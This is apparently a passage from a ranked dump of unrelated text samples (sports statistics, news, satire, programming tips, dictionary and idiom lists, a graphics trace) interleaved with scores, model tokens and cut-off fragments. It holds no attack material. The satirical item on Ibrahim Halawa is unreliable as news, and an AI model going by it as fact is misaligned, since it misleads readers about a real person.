doesn’t trump the fact that Federer needs just one more point to hold. When the Swiss star has surged ahead 40/15 this season, his win percentage has elevated to a near-perfect 99.1 per cent (229/231). + +Marin Cilic is the second best performer of current Top 10 players, holding serve from 40/30 94.6 per cent (596/630) of the time since the beginning of the 2015 season. Former World No. 1s +================================================================================ +Rank = 75; Score = 399360.0 +<|begin_of_text|>Share 0 SHARES + +FOLLOWING his return to Ireland after narrowly avoiding rotting away in an Egyptian prison, Ibrahim Halawa has stated that he just wants to get back to his home with his family, catch up with his friends, eat some Tayto crisps, stick a nice pot of Barry’s tea on the boil and kick back and read all the messages of support that have been posted in the comments section of the Journal.ie over the last four years. + +The now 21-year-old Halawa was released from custody earlier this month, following his arrest in 2013 and subsequent imprisonment, where he was found guilty on all counts of whatever it was he was charged with by trial of social media. + +Having touched down at Dublin airport, the visibly emotional Ibrahim was unable to contain his tears long enough to speak to WWN, but we managed to get an outline of what the Dublin native intends to get up to. + +“Yeah, he did a quick search for his name on Google and it returned 1,457 Journal.ie articles, each with hundreds of comments,” said a source close to the Halawa family. + +“And we said Ibrahim ‘lad, you don’t need to read any of those comments’. But he insisted that when he got home and had a bit more time, he was going to get nice and comfortable with a lovely cup of tea, take a big sip out of it and then start reading what the lovely commentators on the Journal.ie have been saying. We don’t have the heart to tell him why he shouldn’t, but we’ll have towels at the ready”. + +Meanwhile with Halawa now home following his ordeal, the Journal.ie has filed for insolvency.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 76; Score = 397312.0 +<|begin_of_text|>No, I don't mean like this, but rather, If you spent any time trying to figure out xkcd's Umwelt April Fool comic this year, you may be interested in the Haskell source code. They used all sorts of information about you, the browser you were using, the resolution of your screen, to the geocoding of the network address you came from, etc. to serve up a custom web comic. + +Today, davean posted to github the code for waldo, the engine he wrote to drive that comic. + +Alas, he was not kind enough to actually supply the code for the umwelt comic strip itself, so you'll still be left wondering if the internet managed to find all of the Easter eggs. (Are they still Easter eggs when you release something a week before Easter?) You may find the list of links below useful if you want to get a feel for the different responses it gave people. + +[ Article | xkcd's Forum | Hacker News | /r/haskell ] + +[Update: Jun 10, 9:09pm] davean just posted a rather insightful post mortem of the development of waldo that talks a bit about why xkcd uses Haskell internally.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 77; Score = 393216.0 +<|begin_of_text|>Share + +Previous Next 1 of 7 + +Starting off with the 3D printers, Polaroid is launching three models to choose from, varying in size but with each of the units manageable in a home or small office environment. + +“Creativity has always been at the heart of our brand,” said Scott W. Hardy, President and CEO of Polaroid. “For 80 years, we have given consumers the ability to express themselves and explore their own creativity, with the medium of instant photography top of mind. We could not be more excited to now offer another dimension with our new line of 3D printers and pens. Whether it be artwork, prototypes, jewelry, or models, we’re eagerly awaiting what our customers will create and just where their imaginations will take them.” + +The 3D pens are designed to allow users to design 3D models using ABS or PLA filament and both of these models come with 10m of starter filament to get the user started. The two pens are generally similar, but differ in two major ways, with the DRW100 3D being a wired pen, while the DRW101 3D is wireless and comes with an internal battery and charging stand to accommodate that technology. + +The printers have an expected MSRP between $499 and $799 and the pens have an MSRP between $129 and $149. The 3D printers are expected to be available in July, with the pens and filament hitting the market in March.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 78; Score = 393216.0 +<|begin_of_text|>× Is mumps making a comeback in Louisiana? + +BATON ROUGE – The Louisiana Department of Health reports that cases of mumps are popping up in Louisiana. + +As of Wednesday, there have been 12 cases of mumps reported by the Office of Public Health, though officials warn that this number might change daily or multiple times a day. + +“There has been a large outbreak of mumps cases in Arkansas and we’re starting to see cases in Louisiana now,” said Dr. Frank Welch, medical director of the state Immunization Program, Louisiana Department of Health. + +The first cluster of cases has been identified at Louisiana State University in Baton Rouge. The university is taking extra precautions to prevent the spread among students and faculty. + +The Louisiana Department of Health has shared health alerts and education to remind health care providers, schools and universities about the signs and symptoms of mumps. + +“Our Louisiana culture is rich with festivals and celebrations including many scheduled for St. Patrick’s Day this weekend. Large gatherings create an environment where germs and contagious illnesses spread easily,” said Dr. Jimmy Guidry, State Health Officer, LDH. “This is a great time to remind everyone to take proper precautions to avoid getting sick.” + +The Louisiana Department of Health offers these reminders to avoid the spread of infection: + +Do not share drinks, utensils, or food. + +Cover your mouth and nose with a tissue when you cough or sneeze. + +Clean surfaces that are frequently touched (such as toys, doorknobs, tables, counters, etc.) with soap and water or with cleaning wipes regularly. + +Wash your hands frequently with soap and water or an alcohol-based hand cleaner. + +If you have symptoms, stay at home for 5 days after symptoms begin; avoid school, work or large group settings. + +Symptoms of mumps include: + +Fever + +Headache + +Muscle aches + +Tiredness + +Loss of appetite + +Swollen and tender salivary glands under the ears on one or both sides + +Dr. Welch added that a person who has the mumps virus may not know they are ill because it can take several weeks after the infection until the symptoms occur. + +“The infectious period is the time period during which an infected person can spread the disease to others. People are most infectious from one or two days before onset of symptoms until five days after they notice inflammation of their salivary glands,” Welch said.. “It is for this reason that we advise these safe sharing precautions, especially at a time when people gather in large groups.”<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 79; Score = 391168.0 +<|begin_of_text|>Share + +It’s disgusting, it’s duplicitous, and apparently, it’s being done in Uber cars across the United States. A number of reports have surfaced claiming that Uber drivers are planting fake vomit in their cars to collect cleaning fees from unsuspecting customers. The latest alleged victim of such a scandal is Manhattan-based art director Meredith Mandel, who says that her Uber driver placed yellow vomit around his car’s dashboard and floor mats and said that it was Mandel’s doing. This resulted in a $200 cleaning charge, one that Mandel denies she’s responsible for. + +In an interview with Gothamist, Mandel laid out the entire story. In the wee hours of the morning of February 21, she, her boyfriend, and another friend left a restaurant in Fort Greene, Brooklyn, and hailed an Uber to return them to their respective Williamsburg residences. The unremarkable Uber ride ended just before 1:30 a.m., and Mandel went to bed thinking nothing more of what should have been a mundane car experience. + +But when she checked her bill in the morning, she found that a $200 cleaning fee had been tacked on to her $19 fare, with no explanation as to why. When she reached out to customer service, she began piecing together the company’s justification, based largely upon the claim, “The driver let us know that there was a mess on the trip resulting in the need for a car cleaning.” One representative told her that her driver noted that she had been drunk, and another customer service email informed Mandel that “the cleaning fee goes 100 percent to your driver.” + +This, Mandel said, really set the warning lights off in her head. “I was infuriated, because I realized that it actually is a scam,” she told the Gothamist. “At first I was trying to actually give them the benefit of a doubt, but I realized [it] because all of the money goes to the drivers.” + +So she began to build her case against the allegations, coming to a number of conclusions. First of all, she notes, the photos of her so-called vomit show that some landed front seat of the car, which would’ve been impossible given that all three passengers were in the back. Secondly, she notes, the mess was only on parts of the car that could be easily washed. Third, “when she uploaded the photos to a metadata scraping website, no time or date was attached to the photos,” and when Gothamist did the same, they reached +================================================================================ +Rank = 80; Score = 391168.0 +<|begin_of_text|>transitive verb : Verb taking a direct object--for example, " Say something." "She found the cat." + +verbo pronominal : Verbo que se conjuga con un pronombre átono ("me", "te", "se") que concuerda con el sujeto ("lavarse", "irse", "enojarse"). + +transitive verb : Verb taking a direct object--for example, " Say something." "She found the cat." + +verbo transitivo : Verbo que requiere de un objeto directo (" di la verdad", " encontré una moneda"). + +transitive verb : Verb taking a direct object--for example, " Say something." "She found the cat." + +transitive verb : Verb taking a direct object--for example, " Say something." "She found the cat." + +verbo transitivo : Verbo que requiere de un objeto directo (" di la verdad", " encontré una moneda"). + +Compound Forms: + +aprovechar | aprovechar algo + +Spanish English + +aprovechar a (person) take advantage of, make the most of v expr verbal expression: Phrase with special meaning functioning as verb--for example, "put their heads together," "come to an end." + +aprovechar al máximo loc verb locución verbal: Unidad léxica estable formada de dos o más palabras que funciona como verbo ("sacar fuerzas de flaqueza", "acusar recibo"). (sacar todo el partido) make the most of [sth] v expr verbal expression: Phrase with special meaning functioning as verb--for example, "put their heads together," "come to an end." + +Mariana aprovechó al máximo su viaje y visitó muchos países. + +Mariana made the most of her trip and visited many countries. + +aprovechar algo vtr verbo transitivo: Verbo que requiere de un objeto directo ("di la verdad", "encontré una moneda"). (dar nuevo uso) make the most of [sth] v expr verbal expression: Phrase with special meaning functioning as verb--for example, "put their heads together," "come to an end." + +take advantage of [sth] v expr verbal expression: Phrase with special meaning functioning as verb--for example, "put their heads together," "come to an end." + +Martín aprovechó el sobrante de madera para hacer estantes. + +Martin made the most of the leftover wood to make shelves. + +aprove +================================================================================ +Rank = 81; Score = 391168.0 +<|begin_of_text|>Hi there folks. It’s been a long time since I last published a post. I have been busy. However in this post I am going to share some really informative tips and tricks which you might not have known about. So without wasting any time lets get straight to them: + +Enumerate + +Instead of doing: + +i = 0 for item in iterable: print i, item i += 1 + +We can do: + +for i, item in enumerate(iterable): print i, item + +Enumerate can also take a second argument. Here is an example: + +>>> list(enumerate('abc')) [(0, 'a'), (1, 'b'), (2, 'c')] >>> list(enumerate('abc', 1)) [(1, 'a'), (2, 'b'), (3, 'c')] + +Dict/Set comprehensions + +You might know about list comprehensions but you might not be aware of dict/set comprehensions. They are simple to use and just as effective. Here is an example: + +my_dict = {i: i * i for i in xrange(100)} my_set = {i * 15 for i in xrange(100)} # There is only a difference of ':' in both + +Forcing float division: + +If we divide whole numbers Python gives us the result as a whole number even if the result was a float. In order to circumvent this issue we have to do something like this: + +result = 1.0/2 + +But there is another way to solve this problem which even I wasn’t aware of. You can do: + +from __future__ import division result = 1/2 # print(result) # 0.5 + +Voila! Now you don’t need to append.0 in order to get an accurate answer. Do note that this trick is for Python 2 only. In Python 3 there is no need to do the import as it handles this case by default. + +Simple Server + +Do you want to quickly and easily share files from a directory? You can simply do: + +# Python2 python -m SimpleHTTPServer # Python 3 python3 -m http.server + +This would start up a server. + +Evaluating Python expressions + +We all know about eval but do we all know about literal_eval? Perhaps not. You can do: + +import ast my_list = ast.literal_eval(expr) + +Instead of: + +expr = "[1, 2, 3]" my_list = eval(expr) + +I am sure that it’s something new for most of us +================================================================================ +Rank = 82; Score = 389120.0 +<|begin_of_text|>In China, the pressure for young women to get married is huge. So what do you do if you are a gay woman? Ou Xiaobai, a 32-year-old living in Beijing, describes how a marriage of convenience helps her please her family and preserve her freedom. + +I want to protect and be with my girlfriend for my entire life. And that's why I married a man in 2012. + +At that time I was living a happy life with my girlfriend in Beijing. But I was under constant pressure from my family - who lived in Dalian - to get married. + +Ironically my situation would have been easier a decade ago. Then there was less awareness of homosexuality and therefore less suspicion. + +My parents kept asking me if I was seeing anyone. And the situation got worse after my father passed away, because my mother - concerned that I didn't seem to have settled down with anyone - started coming to live with me for a few months every year. + +Realising there was no way that I could avoid the issue, I went to my friends for help - and that's how I got to know about "marriages of convenience". + +I met my husband through a friend. He is a very nice man. Just like me and my girlfriend, he has been with his boyfriend for many years and has not come out. + +'I knew I had made the right decision' + +At our wedding my girlfriend was my bridesmaid, make-up artist and wedding dress consultant. + +She was very happy and supportive of my decision, as was my husband's boyfriend. Despite being brought together by necessity, the four of us got on well and decided the details of the weddings together. + +It gets very tricky if other family members live in the same city - a surprise visit could easily reveal the truth + +After seeing how happy my family were at my wedding, I knew I had made the right decision. Only in this way can we satisfy everyone's needs - my family is happy to know that there will be someone looking after me when they die, and my husband no longer gets encouraged by his colleagues to go on dates with women. + +At first my husband and I visited our families together during traditional holidays such as the Spring Festival and I would be at his side at work gatherings. + +But in the last couple of years, now that our families and colleagues believe we have settled down, we rarely have to act as a real couple. + +What is 100 women? + +BBC 100 Women names 100 influential and inspirational women around the world every year. We create documentaries, features and +================================================================================ +Rank = 83; Score = 387072.0 +<|begin_of_text|>eglCreateContext ( version = 1, context = 0 ) + +eglMakeCurrent ( context = 0 ) + +glGetIntegerv ( pname = GL_MAX_TEXTURE_SIZE, params = [ 2048 ] ) + +glGetIntegerv ( pname = GL_MAX_TEXTURE_SIZE, params = [ 2048 ] ) + +glGetString ( name = GL_VERSION ) = OpenGL ES 2.0 14.01003 + +glGetIntegerv ( pname = GL_MAX_TEXTURE_SIZE, params = [ 2048 ] ) + +glGenBuffers ( n = 1, buffers = [ 1 ] ) + +glBindBuffer ( target = GL_ARRAY_BUFFER, buffer = 1 ) + +glBufferData ( target = GL_ARRAY_BUFFER, size = 64, data = [ 64 bytes ], + +usage = GL_STATIC_DRAW ) + +glDisable ( cap = GL_SCISSOR_TEST ) + +glActiveTexture ( texture = GL_TEXTURE0 ) + +glGenBuffers ( n = 1, buffers = [ 2 ] ) + +glBindBuffer ( target = GL_ARRAY_BUFFER, buffer = 2 ) + +glBufferData ( target = GL_ARRAY_BUFFER, size = 131072, data = 0x0, + +usage = GL_DYNAMIC_DRAW ) + +glGetIntegerv ( pname = GL_MAX_COMBINED_TEXTURE_IMAGE_UNITS, + +params = [ 16 ] ) + +glGetIntegerv ( pname = GL_MAX_TEXTURE_SIZE, params = [ 2048 ] ) + +glGenTextures ( n = 1, textures = [ 1 ] ) + +glBindTexture ( target = GL_TEXTURE_2D, texture = 1 ) + +glEGLImageTargetTexture2DOES ( target = GL_TEXTURE_2D, + +image = 2138532008 ) + +glGetError ( void ) = ( GLenum ) GL_NO_ERROR + +glDisable ( cap = GL_DITHER ) + +glClearColor ( red = 0, 000000, green = 0, 000000, blue = 0, 000000, + +alpha = 0, 000000 ) + +glEnableVertexAttribArray ( index = 0 ) + +glDisable ( cap = GL_BLEND ) + +glGenTextures ( n = 1, textures = [ 2 ] ) + +glBindTexture ( target = GL_TEXTURE_2D, texture = 2 ) + +glPixelStorei ( pname = GL_UNPACK_ALIGNMENT, param = 1 ) + +glTexImage2D ( target = GL_TEXTURE_2D, level = 0, + +internalformat = GL_ALPHA, width = 1024, height = 512, + +border +================================================================================ +Rank = 84; Score = 385024.0 +<|begin_of_text|>Solving Greater Than Sudoku using constraint logic programming + +Greater Than Sudoku (Compdoku) is a variant of sudoku where no initial values are given, but there are greater-than relations inside 3×3 squares that the values must satisfy (the picture from http://avva.livejournal.com/2832977.html): + +I want to show how the puzzle can be solved with constraint logic programming and ECLiPSe CLP. + +Constraint logic programming is a logic programming extension that includes concepts from constraint satisfaction. This paradigm can be very handy for solving grid puzzles like Greater Than Sudoku. + +ECLiPSe CLP is an open-source Prolog-based system with a good support for modeling and solving problems with constraint logic programming. + +Here is a complete program to solve the puzzle using ECLiPSe (https://github.com/kit1980/grid-puzzle-solver/blob/master/greater-than-sudoku.ecl): + +:- lib ( ic ). :- lib ( ic_global ). % http://ic.pics.livejournal.com/avva/111931/80092/80092_original.jpg problem ([]( []( >, <, >, <, <, > ), [](^,v,^,v,v,^,^,^,^), []( >, <, <, <, >, > ), [](v,^,^,^,^,v,^,v,^), []( <, >, <, >, >, < ), []( >, <, >, <, <, < ), [](v,^,^,v,^,v,^,v,v), []( <, <, <, >, >, < ), [](v,v,v,^,v,^,v,^,^), []( >, >, >, <, <, > ), []( >, >, <, >, >, < ), [](v,^,v,^,^,^,v,^,v), []( <, >, <, >, <, > ), [](^,^,^,v,v,^,v,v,v), []( <, >, >, <, <, > ) )). model ( Sudoku ) :- % standard sudoku constraints dim ( Sudoku, [9, 9]), Sudoku :: 1..9, alldifferent_matrix( Sudoku ), ( multifor ([ I, J ], 0, 2), param ( Sudoku ) do Square is Sudoku [3* I +1..3 +================================================================================ +Rank = 85; Score = 382976.0 +<|begin_of_text|>cal - Display a Calendar in Your Terminal 2016-05-09 — 2072 Words — 14 min + +This is my first post in the Command Line Monday series. It gives a short introduction to a useful command line tool every Monday. + +cal is part of the Single UNIX Specification and is should therefore be installed on every unix-like operating system. + +The official manual of cal in the unix specification defines only 3 commands: + +$ cal May 2016 Su Mo Tu We Th Fr Sa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 + +$ cal 2015 2015 January February March Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa 1 2 3 1 2 3 4 5 6 7 1 2 3 4 5 6 7 4 5 6 7 8 9 10 8 9 10 11 12 13 14 8 9 10 11 12 13 14 11 12 13 14 15 16 17 15 16 17 18 19 20 21 15 16 17 18 19 20 21 18 19 20 21 22 23 24 22 23 24 25 26 27 28 22 23 24 25 26 27 28 25 26 27 28 29 30 31 29 30 31 April May June Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa 1 2 3 4 1 2 1 2 3 4 5 6 5 6 7 8 9 10 11 3 4 5 6 7 8 9 7 8 9 10 11 12 13 12 13 14 15 16 17 18 10 11 12 13 14 15 16 14 15 16 17 18 19 20 19 20 +================================================================================ +Rank = 86; Score = 382976.0 +<|begin_of_text|>Idiom Meaning Literal Meaning + +à bon chat, bon rat¹ tit-for-tat to a good cat, a good rat + +à chaque jour suffit sa peine each day as it comes each day's pain is sufficient for it (reference to the Biblical verse Matthew 6:34) + +à cheval donné on ne regarde pas les dents¹ don't criticize gifts, accept them gratefully one does not look at the teeth of a horse that has been given. + +amoureuse comme une chatte¹ very affectionate in love like a female cat + +ânerie¹ stupidity; stupid remarks action proper to a donkey + +appeler un chat un chat¹ to tell it like it is; to call a spade a spade to call a cat a cat + +arriver comme un chien dans un jeu de quille¹ to turn up when least desired or expected to arrive like a dog at a bowling game + +arriver comme un éléphant dans un jeu de quille¹ to turn up at the absolute worst possible time, to have bad timing to arrive like an elephant in a bowling game + +avaler des couleuvres to eat crow, i.e., to put up with humiliation to swallow grass snakes + +avoir bon dos to be an easy scapegoat to have [a] good back + +avoir d'autres chats à fouetter¹ to have other/better things to do, to have bigger fish to fry to have other cats to whip + +avoir de la gueule¹ to be attractive to have [a] mouth; to be mouth-watering + +avoir des lettres to be well read to have letters + +avoir du chien¹ to be a very attractive woman to have "dogginess" + +avoir l'air d'une poule qui a trouvé un couteau to look puzzled or baffled to look like a hen that has found a knife + +avoir la tête dans le cul to be tired, phased out (e.g. after waking up) to have one's head up one's arse + +avoir le cafard to have the blues, to be down in the dumps to have the cockroach + +avoir le cœur sur la main to be generous, to give the shirt off one's back to have one's heart in one's hand + +avoir le cul bordé de nouilles to be lucky to have an arse full of noodles + +avoir le melon to be sure of oneself to have the melon + + +================================================================================ +Rank = 87; Score = 380928.0 +<|begin_of_text|>Share + +As we've previously covered in the Node.js v6.9.0 Release Brief, the Node.js v6 release line went into LTS this week. This is a major step for both Node.js and its users. The release brings a slew of feature additions to a Long Term Service release line. + +With that, you may be wondering what some of the best features added to the newly minted v6 LTS are when compared to the Node.js v4 LTS release line. Luckily, we've compiled a list of 10 of the most useful and interesting new features below - including some highlights like the DevTools Inspector, unhandled Promise rejection warnings, and the Process Warnings API! + +Last year, the Chromium team approached the Node core team and enquired whether there was any interest in re-using the DevTools debugger that was bundled with Blink as a way of interacting with Node.js. The Node.js debugger has not been well cared for over the years and even though it’s functional, JavaScript debuggers in modern browsers have advanced well beyond what Node can offer natively. + +In Node.js v6.3.0, Google’s v8_inspector protocol was extracted from Blink and shipped with Node. This functionality is still considered “experimental” by the Node core team, meaning it is not yet extensively documented and may still be removed in a future version of Node without going through a deprecation cycle. However, given the popularity and power of this tool, and the this is unlikely to happen. A more likely outcome would be for the old debugger to eventually be removed and completely replaced by this new feature. + +When Node.js is run with the --inspect command-line argument (with optional port number argument), a chrome-devtools:// URL is printed to the console. Entering this URL in a Chrome web browser will launch a remote debugging connection directly into the process. Add the additional --debug-brk command line argument to break on the first line of your application so you have time to work with the debugger. You can use Chrome’s DevTools to debug a Node application with similar power with which you can debug frontend JavaScript, including features such as live code editing and full asynchronous call stacks. Read Paul Irish’s post for more details on the kinds of features available right now in Node.js v6 LTS. + +Source: Paul Irish's article, Debugging Node.js with Chrome DevTools + +Far from being exclusive to Chrome, this new protocol is a WebSockets JSON protocol that is well documented and is already implemented in a number of clients and servers. 